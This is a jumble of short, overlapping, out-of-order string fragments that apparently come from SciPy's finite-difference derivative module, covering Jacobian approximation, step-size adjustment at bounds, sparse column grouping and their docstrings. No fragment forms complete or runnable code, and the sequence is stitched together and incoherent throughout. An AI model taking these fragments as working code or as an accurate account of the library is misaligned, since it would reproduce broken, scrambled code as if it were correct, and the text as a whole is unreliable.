"RuntimeError(\"`fun` return value has \" \"more than 1 dimension.\") return", "+ 2 * h_vecs[i] dx = x2[i] - x0[i] f1", "less than n. References ---------- .. [1] <NAME>, <NAME>, and", "Mathematics of Computation 51, 1988. Examples -------- >>> import numpy", "+ h_vec dx = x - x0 df = fun(x)", "shape (n,) Adjusted step sizes. Step size decreases only if", "two different cases. b) In all cases np.atleast_2d can be", "at most 1 dimension.\") lb, ub = _prepare_bounds(bounds, x0) if", "== '1-sided': use_one_sided = np.ones_like(h, dtype=bool) elif scheme == '2-sided':", "'2-point': h, use_one_sided = _adjust_scheme_to_bounds( x0, h, 1, '1-sided', lb,", "groups. Parameters ---------- A : array_like or sparse matrix, shape", "args=(), kwargs={}): \"\"\"Check correctness of a function computing derivatives (Jacobian", "in the full array. j = cols[j] elif method ==", "Applications, 13 (1974), pp. 117-120. \"\"\" if issparse(A): A =", "By default `as_linear_operator` is False. args, kwargs : tuple and", "& e x1[mask_1] += h_vec[mask_1] x2[mask_1] += 2 * h_vec[mask_1]", "shape (m, n). Otherwise it returns a dense array or", "points near the boundary. Both schemes have the second-order accuracy", "= x0 + h_vecs[i] dx = x[i] - x0[i] #", "2: raise ValueError(\"`A` must be 2-dimensional.\") m, n = A.shape", "max(1, abs(x0))``, possibly adjusted to fit into the bounds. For", "all variables. Use it to limit the range of function", "f[i] with respect to x[j]. Parameters ---------- fun : callable", "absolute errors for elements with absolute values less or equal", "It handles a case of gradient computation (m=1) in a", "if order.shape != (n,): raise ValueError(\"`order` has incorrect shape.\") A", "Two columns are in the same group if in each", "3rd edition\", sec. 5.7. .. [2] <NAME>, <NAME>, and <NAME>,", "fitting = np.abs(h_total) <= np.maximum(lower_dist, upper_dist) h_adjusted[violated & fitting] *=", "one or both directions are required. In other words '1-sided'", "ub) elif method == 'cs': use_one_sided = False if sparsity", "from numpy.linalg import norm from scipy.sparse.linalg import LinearOperator from ..sparse", "0).astype(float) * 2 - 1 return rel_step * sign_x0 *", "(np.abs(h_adjusted) <= min_dist)) h_adjusted[adjusted_central] = min_dist[adjusted_central] use_one_sided[adjusted_central] = False return", "and upper bounds on independent variables. Defaults to no bounds.", "difference approximation of the derivatives of a vector-valued function. If", "- x0[i] # Recompute dx as exactly representable number. df", "np.sin(c2 * x[1])] ... ]) ... >>> >>> x0 =", "np.isscalar(order): rng = np.random.RandomState(order) order = rng.permutation(n) else: order =", "import issparse, csc_matrix, csr_matrix, coo_matrix, find from ._group_columns import group_dense,", "h, num_steps, scheme, lb, ub): \"\"\"Adjust final difference scheme to", "return h_adjusted, use_one_sided relative_step = {\"2-point\": EPS**0.5, \"3-point\": EPS**(1/3), \"cs\":", ">= 0).astype(float) * 2 - 1 return rel_step * sign_x0", "Grids\", Mathematics of Computation 51, 1988. Examples -------- >>> import", "x0 = np.array([1.0, 0.5 * np.pi]) >>> approx_derivative(f, x0, args=(1,", "* x[0] * np.cos(c1 * x[1])], ... [np.cos(c2 * x[1]),", "groups) h_vec = h * e if method == '2-point':", "shape (m,) or a scalar. jac : callable Function which", "its several columns by a single function evaluation [3]_. To", "h_vec[mask_1] mask_2 = ~use_one_sided & e x1[mask_2] -= h_vec[mask_2] x2[mask_2]", "which to estimate the derivatives. Float will be converted to", "fun(x0 + h_vec*1.j) df = f1.imag dx = h_vec cols,", "groups, method): m = f0.size n = x0.size row_indices =", "== 'cs': f1 = fun(x0 + h_vecs[i]*1.j) df = f1.imag", "is selected automatically, see Notes. f0 : None or array_like,", "1: raise ValueError(\"`x0` must have at most 1 dimension.\") lb,", "or array_like, optional Relative step size to use. The absolute", "RuntimeError(\"Never be here.\") J_transposed[i] = df / dx if m", "way as `fun`. The return value must be array_like or", "not (np.all(np.isinf(lb)) and np.all(np.isinf(ub))): raise ValueError(\"Bounds not supported when \"", "method == 'cs': f1 = fun(x0 + h_vec*1.j) df =", "and its Applications, 13 (1974), pp. 117-120. .. [3] <NAME>,", "passed has more than 1 dimension.\") if np.any((x0 < lb)", "raise ValueError(\"Never be here.\") # All that's left is to", "2.]) \"\"\" if method not in ['2-point', '3-point', 'cs']: raise", "np.maximum(lower_dist, upper_dist) h_adjusted[violated & fitting] *= -1 forward = (upper_dist", "kwargs=kwargs) abs_err = np.abs(J_to_test - J_diff) return np.max(abs_err / np.maximum(1,", "= False return h_adjusted, use_one_sided relative_step = {\"2-point\": EPS**0.5, \"3-point\":", "is True.\") def fun_wrapped(x): f = np.atleast_1d(fun(x, *args, **kwargs)) if", "num_steps, scheme, lb, ub): \"\"\"Adjust final difference scheme to the", "The result is written to columns which correspond to perturbed", "groups = group_sparse(m, n, A.indices, A.indptr) else: groups = group_dense(m,", "if A.ndim != 2: raise ValueError(\"`A` must be 2-dimensional.\") m,", "jac, x0, bounds=(-np.inf, np.inf), args=(), kwargs={}): \"\"\"Check correctness of a", "check_derivative >>> >>> >>> def f(x, c1, c2): ... return", "accuracy : float The maximum among all relative errors for", "'3-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx =", "the order of columns enumeration. If int or None, a", "h / norm(p) x = x0 + dx*p df =", "h_vec[mask_2] x2[mask_2] += h_vec[mask_2] dx = np.zeros(n) dx[mask_1] = x2[mask_1]", ": tuple of array_like, optional Lower and upper bounds on", "x[1])]) ... >>> x0 = np.array([1.0, 0.5 * np.pi]) >>>", "2-dimensional.\") m, n = A.shape if order is None or", "of array_like, optional Lower and upper bounds on independent variables.", "df = f2 - f1 return df / dx elif", "check_derivative(fun, jac, x0, bounds=(-np.inf, np.inf), args=(), kwargs={}): \"\"\"Check correctness of", "schemes. For dense differencing when m=1 Jacobian is returned with", "np.asarray(J_diff[i, j]).ravel() return np.max(np.abs(abs_err_data) / np.maximum(1, np.abs(J_diff_data))) else: J_diff =", "two ingredients are required: * structure : array_like or sparse", "one direction required to implement finite difference scheme. For example,", "[3]_. To perform such economic computations two ingredients are required:", "f(x0 - 2 * h) scheme : {'1-sided', '2-sided'} Whether", "._group_columns import group_dense, group_sparse EPS = np.finfo(np.float64).eps def _adjust_scheme_to_bounds(x0, h,", "as np >>> from scipy.optimize import approx_derivative >>> >>> def", "have the second-order accuracy in terms of Taylor expansion. Refer", "A greedy sequential algorithm is used to construct groups. Parameters", "/ num_steps) use_one_sided[backward] = True min_dist = np.minimum(upper_dist, lower_dist) /", "num_steps adjusted_central = (~central & (np.abs(h_adjusted) <= min_dist)) h_adjusted[adjusted_central] =", "h_adjusted[forward] = np.minimum( h[forward], 0.5 * upper_dist[forward] / num_steps) use_one_sided[forward]", "shape (n,) Upper bounds on independent variables. Returns ------- h_adjusted", "Default is 0, that is use a random permutation but", "bounds=bounds, sparsity=J_to_test, args=args, kwargs=kwargs) J_to_test = csr_matrix(J_to_test) abs_err = J_to_test", "x0, bounds=bounds, sparsity=J_to_test, args=args, kwargs=kwargs) J_to_test = csr_matrix(J_to_test) abs_err =", "& (np.abs(h_adjusted) <= min_dist)) h_adjusted[adjusted_central] = min_dist[adjusted_central] use_one_sided[adjusted_central] = False", "Perturb variables which are in the same group simultaneously. e", "= h / norm(p) x = x0 + dx*p df", "number of found groups. Each value ``groups[i]`` is an index", "on independent variables. Returns ------- h_adjusted : ndarray, shape (n,)", "random permutation but guarantee repeatability. Returns ------- groups : ndarray", "/ np.maximum(1, np.abs(J_diff_data))) else: J_diff = approx_derivative(fun, x0, bounds=bounds, args=args,", "structure, groups = sparsity else: structure = sparsity groups =", "is None or np.isscalar(order): rng = np.random.RandomState(order) order = rng.permutation(n)", "to center schemes. lb : ndarray, shape (n,) Lower bounds", "sparsity structure, and groups are computed inside the function. A", "iterable of int with shape (n,) or None Permutation array", "ndarray, shape (n,) Adjusted step sizes. Step size decreases only", "are in the same group simultaneously. e = np.equal(group, groups)", "even if n=1). It must return 1-D array_like of shape", "= np.ravel(J_transposed) return J_transposed.T def _sparse_difference(fun, x0, f0, h, use_one_sided,", "known to have only few non-zero elements in each row,", "forward or backward difference near the boundary. - 'cs' -", "estimate its several columns by a single function evaluation [3]_.", "& fitting] *= -1 forward = (upper_dist >= lower_dist) &", "References ---------- .. [1] <NAME>, <NAME>, and <NAME>, \"On the", ": bool, optional When True the function returns an `scipy.sparse.linalg.LinearOperator`.", "x1 = x0.copy() x2 = x0.copy() mask_1 = use_one_sided &", "structure = csc_matrix(structure) else: structure = np.atleast_2d(structure) groups = np.atleast_1d(groups)", "dx[mask_2] = x2[mask_2] - x1[mask_2] f1 = fun(x1) f2 =", "groups are computed inside the function. A tuple is interpreted", "dx as exactly representable number. df = fun(x) - f0", "norm from scipy.sparse.linalg import LinearOperator from ..sparse import issparse, csc_matrix,", "scheme == '2-sided': central = (lower_dist >= h_total) & (upper_dist", ": None or array_like, optional Relative step size to use.", "terms of Taylor expansion. Refer to [2]_ for the formulas", "< lb) | (x0 > ub)): raise ValueError(\"`x0` violates bound", "as (structure, groups). If None (default), a standard dense differencing", "automatically. The well-known central difference scheme is used for points", "df = fun(x) - f0 elif method == '3-point' and", "/ num_steps adjusted_central = (~central & (np.abs(h_adjusted) <= min_dist)) h_adjusted[adjusted_central]", "x0.shape) if ub.ndim == 0: ub = np.resize(ub, x0.shape) return", "== 'cs': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx", "to estimate the derivatives. Float will be converted to 1-D", "- f1[rows] elif method == 'cs': f1 = fun(x0 +", "perform such economic computations two ingredients are required: * structure", "of a function computing derivatives. Notes ----- If `rel_step` is", "'cs']: raise ValueError(\"Unknown method '%s'. \" % method) x0 =", "ub)): raise ValueError(\"`x0` violates bound constraints.\") if as_linear_operator: if rel_step", "central difference in interior points and the second order accuracy", "Such relative step approximately minimizes a sum of truncation and", "it returns a dense array or a sparse matrix depending", "Mathematics and its Applications, 13 (1974), pp. 117-120. .. [3]", "a ndarray with shape (m, n) is returned. If `sparsity`", "accuracy forward or backward difference. - '3-point' - use central", "abs(x0))``, possibly adjusted to fit into the bounds. For ``method='3-point'``", "... ]) ... >>> >>> x0 = np.array([1.0, 0.5 *", "x2 = x0 + 2 * h_vecs[i] dx = x2[i]", "m == 1: J_transposed = np.ravel(J_transposed) return J_transposed.T def _sparse_difference(fun,", "np.empty(m) rows = i[mask] df[rows] = -3 * f0[rows] +", "h_adjusted, use_one_sided relative_step = {\"2-point\": EPS**0.5, \"3-point\": EPS**(1/3), \"cs\": EPS**0.5}", "gradient) by comparison with a finite difference approximation. Parameters ----------", "'cs': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx =", "= np.zeros(n) dx[mask_1] = x2[mask_1] - x0[mask_1] dx[mask_2] = x2[mask_2]", "to which ith column assigned. The procedure was helpful only", "`fun` and `jac`. Both empty by default. The calling signature", "left is to compute the fraction. We store i, j", "if issparse(A): A = csc_matrix(A) else: A = np.atleast_2d(A) A", "* np.pi]) >>> check_derivative(f, jac, x0, args=(1, 2)) 2.4492935982947064e-16 \"\"\"", "array_like or sparse matrix of shape (m, n). A zero", "lower, then it is likely that your `jac` implementation is", "None (default), a standard dense differencing will be used. Note,", "it is always returned as a 2-D structure, for ndarrays,", "defines the order of columns enumeration. If int or None,", "'2-point' - use the first order accuracy forward or backward", "same but separate one-sided # and two-sided schemes. x1 =", "from ._group_columns import group_dense, group_sparse EPS = np.finfo(np.float64).eps def _adjust_scheme_to_bounds(x0,", "an `scipy.sparse.linalg.LinearOperator`. Otherwise it returns a dense array or a", "fractions = [] n_groups = np.max(groups) + 1 for group", "f0, h, method): m = f0.size n = x0.size if", "np.zeros(m) dx = h / norm(p) x = x0 +", ": ndarray of bool, shape (n,) Whether to switch to", "* x[1])] ... ]) ... >>> >>> x0 = np.array([1.0,", "np.maximum(1.0, np.abs(x0)) def _prepare_bounds(bounds, x0): lb, ub = [np.asarray(b, dtype=float)", "to switch to one-sided scheme. Informative only for ``scheme='2-sided'``. \"\"\"", "and later construct coo_matrix. row_indices.append(i) col_indices.append(j) fractions.append(df[i] / dx[j]) row_indices", "lower_dist) / num_steps adjusted_central = (~central & (np.abs(h_adjusted) <= min_dist))", "dimensions. References ---------- .. [1] W. H. Press et. al.", "in interior points and the second order accuracy forward or", "or array_like, optional If not None it is assumed to", "if as_linear_operator and not (np.all(np.isinf(lb)) and np.all(np.isinf(ub))): raise ValueError(\"Bounds not", "element (i, j) is a partial derivative of f[i] with", "True. sparsity : {None, array_like, sparse matrix, 2-tuple}, optional Defines", "difference scheme to the presence of bounds. Parameters ---------- x0", "it's possible to estimate its several columns by a single", "is on the order of 1e-6 or lower, then it", "np.cos(c1 * x[1])], ... [np.cos(c2 * x[1]), -c2 * x[0]", "for elements with absolute values higher than 1 and absolute", "scheme : {'1-sided', '2-sided'} Whether steps in one or both", "scheme is used for points near the boundary. Both schemes", "x0 : ndarray, shape (n,) Point at which we wish", "bogus results. rel_step : None or array_like, optional Relative step", "x[j]. Parameters ---------- fun : callable Function of which to", "Also -------- check_derivative : Check correctness of a function computing", "= -lower_dist[backward] / num_steps elif scheme == '2-sided': central =", "= x0.copy() mask_1 = use_one_sided & e x1[mask_1] += h_vec[mask_1]", "a scalar. x0 : array_like of shape (n,) or float", "* np.cos(c1 * x[1])], ... [np.cos(c2 * x[1]), -c2 *", "the order of 1e-6 or lower, then it is likely", "on how `sparsity` is defined. If `sparsity` is None then", "= 2*h / norm(p) x1 = x0 - (dx/2)*p x2", "Additional arguments passed to `fun`. Both empty by default. The", "min_dist)) h_adjusted[adjusted_central] = min_dist[adjusted_central] use_one_sided[adjusted_central] = False return h_adjusted, use_one_sided", "+ 1 for group in range(n_groups): # Perturb variables which", "i, j, _ = find(structure[:, cols]) # Restore column indices", "a sign flip or switching to one-sided scheme doesn't allow", "groups, method) def _linear_operator_difference(fun, x0, f0, h, method): m =", "rel_step, method) else: h = _compute_absolute_step(rel_step, x0, method) if method", "scheme == '1-sided': use_one_sided = np.ones_like(h, dtype=bool) elif scheme ==", "A finite difference scheme for '3-point' method is selected automatically.", "= (lower_dist >= h_total) & (upper_dist >= h_total) forward =", "in selected columns of Jacobian. i, j, _ = find(structure[:,", "comparison with a finite difference approximation. Parameters ---------- fun :", "formulas of 3-point forward and backward difference schemes. For dense", "* h) scheme : {'1-sided', '2-sided'} Whether steps in one", "step sizes. Step size decreases only if a sign flip", "n, A.indices, A.indptr) else: groups = group_dense(m, n, A) groups[order]", "f2[rows] - f1[rows] elif method == 'cs': f1 = fun(x0", ": {'1-sided', '2-sided'} Whether steps in one or both directions", "num_steps : int Number of `h` steps in one direction", "final difference scheme to the presence of bounds. Parameters ----------", "them has zero. A greedy sequential algorithm is used to", "'2-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx =", "import check_derivative >>> >>> >>> def f(x, c1, c2): ...", "f0 return df / dx elif method == '3-point': def", "(n,) (never a scalar even if n=1). It must return", "---------- .. [1] <NAME>, <NAME>, and <NAME>, \"On the estimation", "(dx/2)*p f1 = fun(x1) f2 = fun(x2) df = f2", "lower_dist = x0 - lb upper_dist = ub - x0", "for float64 numbers, s=2 for '2-point' method and s=3 for", "else: f0 = np.atleast_1d(f0) if f0.ndim > 1: raise ValueError(\"`f0`", "ndarray of int, shape (n,) Contains values from 0 to", "= sparsity groups = group_columns(sparsity) if issparse(structure): structure = csc_matrix(structure)", "sparsity structure of the Jacobian matrix. If the Jacobian matrix", "When True the function returns an `scipy.sparse.linalg.LinearOperator`. Otherwise it returns", "shape.\") A = A[:, order] if issparse(A): groups = group_sparse(m,", "issparse(structure): structure = csc_matrix(structure) else: structure = np.atleast_2d(structure) groups =", "matrix depending on how `sparsity` is defined. If `sparsity` is", "- (dx/2)*p x2 = x0 + (dx/2)*p f1 = fun(x1)", "f1 = fun(x0 + h_vec*1.j) df = f1.imag dx =", "'3-point' and not use_one_sided[i]: x1 = x0 - h_vecs[i] x2", "fun(x) df = f1.imag return df / dx else: raise", "be '1-sided' or '2-sided'.\") if np.all((lb == -np.inf) & (ub", "g(x): ... return x**2 if x >= 1 else x", "scheme doesn't allow to take a full step. use_one_sided :", "jac(x0, *args, **kwargs) if issparse(J_to_test): J_diff = approx_derivative(fun, x0, bounds=bounds,", "group_dense, group_sparse EPS = np.finfo(np.float64).eps def _adjust_scheme_to_bounds(x0, h, num_steps, scheme,", "backward = (upper_dist < lower_dist) & ~fitting h_adjusted[backward] = -lower_dist[backward]", "= [np.asarray(b, dtype=float) for b in bounds] if lb.ndim ==", "'3-point' and use_one_sided[i]: x1 = x0 + h_vecs[i] x2 =", "Formulas on Arbitrarily Spaced Grids\", Mathematics of Computation 51, 1988.", "that is use a random permutation but guarantee repeatability. Returns", "finite differencing [1]_. Two columns are in the same group", "def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None, bounds=(-np.inf, np.inf), sparsity=None, as_linear_operator=False,", "to estimate the derivatives. Float will be converted to a", "== 'cs': use_one_sided = False if sparsity is None: return", "if not issparse(sparsity) and len(sparsity) == 2: structure, groups =", "(row_indices, col_indices)), shape=(m, n)) return csr_matrix(J) def check_derivative(fun, jac, x0,", "is used with `order` used as a random seed. Default", "a partial derivative of f[i] with respect to x[j]. Parameters", "difference approximation of the Jacobian matrix. If `as_linear_operator` is True", "the estimation of sparse Jacobian matrices\", Journal of the Institute", "np.array([1.0, 0.5 * np.pi]) >>> check_derivative(f, jac, x0, args=(1, 2))", ": ndarray, shape (n,) Desired finite difference steps. num_steps :", "all relative errors for elements with absolute values higher than", "np.max(groups) + 1 for group in range(n_groups): # Perturb variables", "x0 : array_like of shape (n,) or float Point at", "a full step. use_one_sided : ndarray of bool, shape (n,)", "use. The absolute step size is computed as ``h =", "else: raise ValueError(\"Never be here.\") # All that's left is", "np.zeros_like(h, dtype=bool) else: raise ValueError(\"`scheme` must be '1-sided' or '2-sided'.\")", "that your `jac` implementation is correct. See Also -------- approx_derivative", "of computing ``J.dot(p)`` for any vector ``p`` of shape (n,),", "- f2 elif method == '3-point' and not use_one_sided[i]: x1", "* x[1])]) ... >>> x0 = np.array([1.0, 0.5 * np.pi])", "groups = np.atleast_1d(groups) return _sparse_difference(fun_wrapped, x0, f0, h, use_one_sided, structure,", "the Jacobian matrix. If the Jacobian matrix is known to", "of them has zero. A greedy sequential algorithm is used", "sparse matrices and linear operators it is always returned as", "tuple and dict, optional Additional arguments passed to `fun`. Both", "to this function is ndarray of shape (n,) (never a", "1.]) >>> approx_derivative(g, x0, bounds=(1.0, np.inf)) array([ 2.]) \"\"\" if", "function. If a function maps from R^n to R^m, its", "ValueError(\"`f0` passed has more than 1 dimension.\") if np.any((x0 <", "dx*p*1.j f1 = fun(x) df = f1.imag return df /", "optional If not None it is assumed to be equal", "'2-point' method and s=3 for '3-point' method. Such relative step", "[] fractions = [] n_groups = np.max(groups) + 1 for", "for a given sparsity structure, use `group_columns` to obtain it.", "- f0 # The result is written to columns which", "for numerical differentiation.\"\"\" from __future__ import division import numpy as", "one of them has zero. A greedy sequential algorithm is", "None Permutation array which defines the order of columns enumeration.", "= (x0 >= 0).astype(float) * 2 - 1 return rel_step", "raise ValueError(\"`x0` must have at most 1 dimension.\") lb, ub", "as np >>> from scipy.optimize import check_derivative >>> >>> >>>", "!= x0.shape or ub.shape != x0.shape: raise ValueError(\"Inconsistent shapes between", "structure = sparsity groups = group_columns(sparsity) if issparse(structure): structure =", "np.atleast_1d(x0) if x0.ndim > 1: raise ValueError(\"`x0` must have at", "h, use_one_sided = _adjust_scheme_to_bounds( x0, h, 1, '1-sided', lb, ub)", "use `group_columns` to obtain it. A single array or a", "= x0.size row_indices = [] col_indices = [] fractions =", "use_one_sided & e x1[mask_1] += h_vec[mask_1] x2[mask_1] += 2 *", "x[1])]) ... >>> def jac(x, c1, c2): ... return np.array([", "f0.size n = x0.size row_indices = [] col_indices = []", "0.]]) Bounds can be used to limit the region of", "'3-point', 'cs']: raise ValueError(\"Unknown method '%s'. \" % method) x0", "np.atleast_1d(groups) return _sparse_difference(fun_wrapped, x0, f0, h, use_one_sided, structure, groups, method)", "/ dx if m == 1: J_transposed = np.ravel(J_transposed) return", "relative_step[method] sign_x0 = (x0 >= 0).astype(float) * 2 - 1", "all non-zero elements in selected columns of Jacobian. i, j,", "direct access to individual elements of the matrix. By default", "steps. num_steps : int Number of `h` steps in one", "x0, f0, h, use_one_sided, structure, groups, method) def _linear_operator_difference(fun, x0,", "~fitting h_adjusted[backward] = -lower_dist[backward] / num_steps elif scheme == '2-sided':", "not implemented when `as_linear_operator` is True. sparsity : {None, array_like,", "# Recompute dx as exactly representable number. df = fun(x)", "bounds=(-np.inf, 1.0)) array([ 1.]) >>> approx_derivative(g, x0, bounds=(1.0, np.inf)) array([", "else: h = _compute_absolute_step(rel_step, x0, method) if method == '2-point':", "as_linear_operator and not (np.all(np.isinf(lb)) and np.all(np.isinf(ub))): raise ValueError(\"Bounds not supported", "use a complex-step finite difference scheme. This assumes that the", "2)) array([[ 1., 0.], [-1., 0.]]) Bounds can be used", "estimation of sparse Jacobian matrices\", Journal of the Institute of", "by default. The calling signature is ``fun(x, *args, **kwargs)``. Returns", "depending on `sparsity`. The linear operator provides an efficient way", "csc_matrix, csr_matrix, coo_matrix, find from ._group_columns import group_dense, group_sparse EPS", "adjusted to fit into the bounds. For ``method='3-point'`` the sign", "are in the same group if in each row at", "this function is ndarray of shape (n,) (never a scalar", "cases. b) In all cases np.atleast_2d can be called to", ">>> x0 = 1.0 >>> approx_derivative(g, x0, bounds=(-np.inf, 1.0)) array([", "= (upper_dist >= lower_dist) & ~fitting h_adjusted[forward] = upper_dist[forward] /", "**kwargs) if issparse(J_to_test): J_diff = approx_derivative(fun, x0, bounds=bounds, sparsity=J_to_test, args=args,", "min_dist[adjusted_central] use_one_sided[adjusted_central] = False return h_adjusted, use_one_sided relative_step = {\"2-point\":", "returned as a 1-D gradient array with shape (n,). See", "number. df = fun(x) - f0 elif method == '3-point'", "its derivatives form m-by-n matrix called the Jacobian, where an", "dx if m == 1: J_transposed = np.ravel(J_transposed) return J_transposed.T", "_prepare_bounds(bounds, x0): lb, ub = [np.asarray(b, dtype=float) for b in", "same way as `fun`. The return value must be array_like", "signature is ``fun(x, *args, **kwargs)``. Returns ------- J : {ndarray,", "gradient array with shape (n,). See Also -------- check_derivative :", "(ub == np.inf)): return h, use_one_sided h_total = h *", ">= h_total) & (upper_dist >= h_total) forward = (upper_dist >=", "= {\"2-point\": EPS**0.5, \"3-point\": EPS**(1/3), \"cs\": EPS**0.5} def _compute_absolute_step(rel_step, x0,", "here.\") # All that's left is to compute the fraction.", "of shape (n,) (never a scalar even if n=1). It", "differentiation.\"\"\" from __future__ import division import numpy as np from", "scheme. Informative only for ``scheme='2-sided'``. \"\"\" if scheme == '1-sided':", "bound will be the same for all variables. Use it", "'3-point' - use central difference in interior points and the", "dx = x[i] - x0[i] # Recompute dx as exactly", "= np.hstack(fractions) J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n)) return", "def _adjust_scheme_to_bounds(x0, h, num_steps, scheme, lb, ub): \"\"\"Adjust final difference", "~central h_adjusted[backward] = -np.minimum( h[backward], 0.5 * lower_dist[backward] / num_steps)", "np.atleast_2d(A) A = (A != 0).astype(np.int32) if A.ndim != 2:", "!= (n,): raise ValueError(\"`order` has incorrect shape.\") A = A[:,", "x0 df = fun(x) - f0 # The result is", "ub : ndarray, shape (n,) Upper bounds on independent variables.", "Notes ----- If `rel_step` is not provided, it assigned to", "True.\") def fun_wrapped(x): f = np.atleast_1d(fun(x, *args, **kwargs)) if f.ndim", "order of 1e-6 or lower, then it is likely that", "it is likely that your `jac` implementation is correct. See", "central = (lower_dist >= h_total) & (upper_dist >= h_total) forward", "a csr_matrix with shape (m, n). For sparse matrices and", "where an element (i, j) is a partial derivative of", "f2 = fun(x2) df = f2 - f1 return df", "= np.minimum(upper_dist, lower_dist) / num_steps adjusted_central = (~central & (np.abs(h_adjusted)", "sign_x0 = (x0 >= 0).astype(float) * 2 - 1 return", "differencing [1]_. Two columns are in the same group if", "In the example below we compute left and right derivative", "np.zeros_like(p)): return np.zeros(m) dx = 2*h / norm(p) x1 =", "We store i, j and # fractions as separate arrays", "matrix with an appropriate shape. x0 : array_like of shape", "truncation and round-off errors, see [1]_. A finite difference scheme", "to ``fun(x0)``, in this case the ``fun(x0)`` is not called.", "= x0 + dx*p df = fun(x) - f0 return", "dx = 2*h / norm(p) x1 = x0 - (dx/2)*p", "True the function returns an `scipy.sparse.linalg.LinearOperator`. Otherwise it returns a", "method == '3-point' and use_one_sided[i]: x1 = x0 + h_vecs[i]", "with shape (m, n). For sparse matrices and linear operators", "df[rows] = -3 * f0[rows] + 4 * f1[rows] -", "== 0: lb = np.resize(lb, x0.shape) if ub.ndim == 0:", "in range(h.size): if method == '2-point': x = x0 +", "by default. The calling signature is ``fun(x, *args, **kwargs)`` and", "on Arbitrarily Spaced Grids\", Mathematics of Computation 51, 1988. Examples", "f.ndim > 1: raise RuntimeError(\"`fun` return value has \" \"more", "x ... >>> x0 = 1.0 >>> approx_derivative(g, x0, bounds=(-np.inf,", "1.0)) array([ 1.]) >>> approx_derivative(g, x0, bounds=(1.0, np.inf)) array([ 2.])", "conceptually the same but separate one-sided # and two-sided schemes.", "scheme. This assumes that the user function is real-valued and", "np.finfo(np.float64).eps def _adjust_scheme_to_bounds(x0, h, num_steps, scheme, lb, ub): \"\"\"Adjust final", "than 1. If `accuracy` is on the order of 1e-6", "the other hand when n=1 Jacobian is returned with a", "h, use_one_sided, method) else: if not issparse(sparsity) and len(sparsity) ==", "method. Such relative step approximately minimizes a sum of truncation", "Contains values from 0 to n_groups-1, where n_groups is the", "dx = h_vec cols, = np.nonzero(e) i, j, _ =", "will be used. Note, that sparse differencing makes sense only", "`jac`. Returns ------- accuracy : float The maximum among all", "bounds. Each bound must match the size of `x0` or", "a sparse matrix depending on `sparsity`. The linear operator provides", "lb, ub = [np.asarray(b, dtype=float) for b in bounds] if", "correctness of a function computing derivatives. Notes ----- If `rel_step`", "if lb.ndim == 0: lb = np.resize(lb, x0.shape) if ub.ndim", "difference schemes. For dense differencing when m=1 Jacobian is returned", "= x0.size J_transposed = np.empty((n, m)) h_vecs = np.diag(h) for", "None (default) then step is selected automatically, see Notes. f0", "if f0 is None: f0 = fun_wrapped(x0) else: f0 =", "f1 = fun(x1) f2 = fun(x2) cols, = np.nonzero(e) i,", "* 2 - 1 return rel_step * sign_x0 * np.maximum(1.0,", "return df / dx elif method == 'cs': def matvec(p):", "args=(1, 2)) 2.4492935982947064e-16 \"\"\" J_to_test = jac(x0, *args, **kwargs) if", "= False if sparsity is None: return _dense_difference(fun_wrapped, x0, f0,", "f1 elif method == 'cs': f1 = fun(x0 + h_vecs[i]*1.j)", "of found groups. Each value ``groups[i]`` is an index of", "f1.imag dx = h_vec cols, = np.nonzero(e) i, j, _", "fun(x2) df = f2 - f1 elif method == 'cs':", "< lb) | (x > ub) fitting = np.abs(h_total) <=", "as separate arrays and later construct coo_matrix. row_indices.append(i) col_indices.append(j) fractions.append(df[i]", "h_vecs[i] dx = x[i] - x0[i] # Recompute dx as", "use the first order accuracy forward or backward difference. -", "which computes Jacobian matrix of `fun`. It must work with", "has \" \"more than 1 dimension.\") return f if f0", "scipy.optimize import check_derivative >>> >>> >>> def f(x, c1, c2):", "= h * num_steps h_adjusted = h.copy() lower_dist = x0", "where each row contains few non-zero elements. as_linear_operator : bool,", "(m, n). For sparse matrices and linear operators it is", "method == 'cs': use_one_sided = False if sparsity is None:", "array. bounds : 2-tuple of array_like, optional Lower and upper", "relative_step[method] return _linear_operator_difference(fun_wrapped, x0, f0, rel_step, method) else: h =", "== '2-point': h, use_one_sided = _adjust_scheme_to_bounds( x0, h, 1, '1-sided',", "= -np.minimum( h[backward], 0.5 * lower_dist[backward] / num_steps) use_one_sided[backward] =", "(n,) Contains values from 0 to n_groups-1, where n_groups is", "-np.inf) & (ub == np.inf)): return h, use_one_sided h_total =", "= fun_wrapped(x0) else: f0 = np.atleast_1d(f0) if f0.ndim > 1:", "= x0 + h_total violated = (x < lb) |", "c2): ... return np.array([x[0] * np.sin(c1 * x[1]), ... x[0]", "raise ValueError(\"`A` must be 2-dimensional.\") m, n = A.shape if", "np.sin(c1 * x[1]), ... x[0] * np.cos(c2 * x[1])]) ...", "mask_1 = use_one_sided & e x1[mask_1] += h_vec[mask_1] x2[mask_1] +=", "of 1e-6 or lower, then it is likely that your", "schemes, '2-sided' applies to center schemes. lb : ndarray, shape", "If the Jacobian matrix is known to have only few", "use_one_sided[i]: x1 = x0 - h_vecs[i] x2 = x0 +", "sparse matrix depending on how `sparsity` is defined. If `sparsity`", "f0.size n = x0.size if method == '2-point': def matvec(p):", "near the boundary. - 'cs' - use a complex-step finite", "= np.random.RandomState(order) order = rng.permutation(n) else: order = np.asarray(order) if", "Returns ------- h_adjusted : ndarray, shape (n,) Adjusted step sizes.", "``groups[i]`` is an index of a group to which ith", "that sparse differencing makes sense only for large Jacobian matrices", "---------- fun : callable Function of which to estimate the", "= h * e if method == '2-point': x =", "Desired finite difference steps. num_steps : int Number of `h`", "= h.copy() lower_dist = x0 - lb upper_dist = ub", "element means that a corresponding element of the Jacobian identically", "Finite Difference Formulas on Arbitrarily Spaced Grids\", Mathematics of Computation", "Check correctness of a function computing derivatives. Notes ----- If", "from the boundary, and 3-point forward or backward scheme is", "if sparsity is None: return _dense_difference(fun_wrapped, x0, f0, h, use_one_sided,", "_compute_absolute_step(rel_step, x0, method) if method == '2-point': h, use_one_sided =", "shape (n,) Whether to switch to one-sided scheme. Informative only", "= x0 + h_vecs[i] dx = x2[i] - x1[i] f1", "inside the function. A tuple is interpreted as (structure, groups).", "pp. 117-120. .. [3] <NAME>, \"Generation of Finite Difference Formulas", "or gradient) by comparison with a finite difference approximation. 